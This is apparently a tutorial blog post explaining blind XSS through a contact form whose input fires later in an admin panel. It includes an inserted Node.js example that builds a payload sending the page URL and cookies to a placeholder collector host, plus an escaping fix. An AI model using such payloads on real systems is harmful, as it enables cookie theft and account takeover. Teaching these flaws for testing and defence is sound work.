THE BUG OFTEN IGNORED: BLIND XSS

INTRODUCTION

What is XSS?

  1. Find an input field.
  2. Inject your JavaScript code (e.g. <script>alert(1)</script>).
  3. If it is rendered unescaped in the response, so the alert fires in your browser, you have an XSS!

What is Blind XSS?

  1. We submit our details on the Contact Us page (e.g. http://vicitm.com/contact_us).
  2. We get a message saying "Thanks for contacting us." Our input is not reflected anywhere we can see, so a plain alert(1) payload tells us nothing.
  3. The admin later visits an endpoint that displays all the details submitted through the Contact Us page (https://victim.com/admin/contact_details), and our input is rendered there, in the admin's browser.
  4. Now the admin can contact each user individually using that data. Because the payload fires in a session we never see, a blind XSS payload has to report back out-of-band (for example by requesting a URL on a server we control) instead of popping an alert.
[Figure: a sample Contact Us page]
[Figure: after form submission, the input is not reflected]
[Figure: admin panel, where the input is reflected]
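The two lists above describe the same flaw seen from two places: the page that swallows the input and the admin page that renders it. The following is an added example, written for this edit and not code from the original post or from the demo site, that models that flow in plain Node.js. The collector host, the render functions and the submissions are all made up for illustration; the only real technique is the out-of-band callback that replaces alert(1), and the HTML escaping that fixes the admin panel.

```javascript
// Added example (not from the original post): a minimal model of the
// contact-us flow. The submitter's response never echoes the message, but
// the admin panel does, so the payload needs an out-of-band callback to
// reveal that it fired. COLLECTOR and every function name are hypothetical.

const COLLECTOR = "https://collector.example"; // attacker-controlled host, assumed

// Blind XSS payload. alert(1) would fire in the admin's browser where we
// cannot see it; instead the payload beacons the page URL and cookies to
// the collector. (document.cookie omits HttpOnly cookies, so the URL alone
// is often the more useful signal that the payload ran.)
function blindXssPayload(collector = COLLECTOR) {
  return `<script>new Image().src=${JSON.stringify(collector)}` +
    `+'/?u='+encodeURIComponent(location.href)` +
    `+'&c='+encodeURIComponent(document.cookie)</script>`;
}

// Escape the characters that matter in an HTML text or attribute context.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed submissions, as the contact form would store them.
const submissions = [
  { name: "alice", email: "alice@example.com", message: "Hi there" },
  { name: "mallory", email: "m@example.com", message: blindXssPayload() },
];

// Response the submitter sees: the input is not reflected at all, so no
// alert fires for the attacker and nothing suggests a bug.
function renderThanks(_submission) {
  return "<p>Thanks for contacting us.</p>";
}

// Vulnerable admin panel: stored input is concatenated straight into HTML.
function renderAdminPanelVulnerable(rows) {
  return "<table>" + rows.map((r) =>
    `<tr><td>${r.name}</td><td>${r.email}</td><td>${r.message}</td></tr>`
  ).join("") + "</table>";
}

// Fixed admin panel: every stored field is escaped for the HTML context.
function renderAdminPanelSafe(rows) {
  return "<table>" + rows.map((r) =>
    `<tr><td>${escapeHtml(r.name)}</td><td>${escapeHtml(r.email)}</td>` +
    `<td>${escapeHtml(r.message)}</td></tr>`
  ).join("") + "</table>";
}

// Would the rendered HTML execute a script tag that came from user input?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log(renderThanks(submissions[1]));
console.log("vulnerable panel executes payload:",
  containsScriptTag(renderAdminPanelVulnerable(submissions)));
console.log("fixed panel executes payload:",
  containsScriptTag(renderAdminPanelSafe(submissions)));
```

The point of the beacon is that the only evidence you get is a hit on your collector, usually minutes or days later, so log the request fully (URL, referer, user agent, source IP). On a real engagement the collector must be a host you control and the payload must stay within the authorized scope; a Content-Security-Policy on the admin page can also block the callback even when the injection itself succeeds.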

BLIND XSS: DEMONSTRATION

  1. Visit xss.bepractical.tech

VIDEO DEMONSTRATION

CONCLUSION
